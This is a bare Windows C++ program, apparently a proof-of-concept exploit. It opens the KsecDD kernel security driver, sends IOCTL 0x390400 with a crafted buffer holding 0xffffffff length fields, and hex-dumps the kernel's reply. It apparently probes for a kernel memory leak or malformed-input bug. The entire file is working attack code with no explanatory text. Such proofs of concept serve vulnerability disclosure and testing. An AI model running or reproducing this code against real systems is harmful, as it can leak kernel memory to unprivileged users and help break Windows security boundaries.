#include <Windows.h>
#include <bcrypt.h>
#include <winternl.h>
#include <cstdio>

VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  for (ULONG i = 0; i < dwBytes; i += 16) {
    printf("%.8x: ", i);

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes) {
        printf("%.2x ", Data[i + j]);
      }
      else {
        printf("?? ");
      }
    }

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
        printf("%c", Data[i + j]);
      }
      else {
        printf(".");
      }
    }

    printf("\n");
  }
}

int main() {
  HANDLE hksecdd;
  OBJECT_ATTRIBUTES objattr;
  UNICODE_STRING ksecdd_name;
  IO_STATUS_BLOCK iob;
  NTSTATUS st;

  RtlInitUnicodeString(&ksecdd_name, L"\\Device\\KsecDD");
  InitializeObjectAttributes(&objattr, &ksecdd_name, 0, NULL, 0);
  st = NtOpenFile(&hksecdd,
                  FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
                  &objattr,
                  &iob,
                  FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                  FILE_SYNCHRONOUS_IO_NONALERT);
  if (!NT_SUCCESS(st)) {
    printf("NtOpenFile failed, %x\n", st);
    return 1;
  }

  BYTE InputBuffer[] = "\x4d\x3c\x2b\x1a\x00\x00\x02\x00\xff\xff\xff\xff\x00\x00\x00\x00\x20\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x02\x00\x00\x00\x33\x00\x44\x00\x45\x00\x53\x00\x00\x00";
  BYTE OutputBuffer[0x200] = { /* zero padding */ };
  DWORD BytesReturned = 0;
  if (!DeviceIoControl(hksecdd, 0x390400, InputBuffer, sizeof(InputBuffer), OutputBuffer, sizeof(OutputBuffer), &BytesReturned, NULL)) {
    printf("DeviceIoControl failed, %d\n", GetLastError());
    CloseHandle(hksecdd);
    return 1;
  }

  PrintHex(OutputBuffer, BytesReturned);

  CloseHandle(hksecdd);

  return 0;
}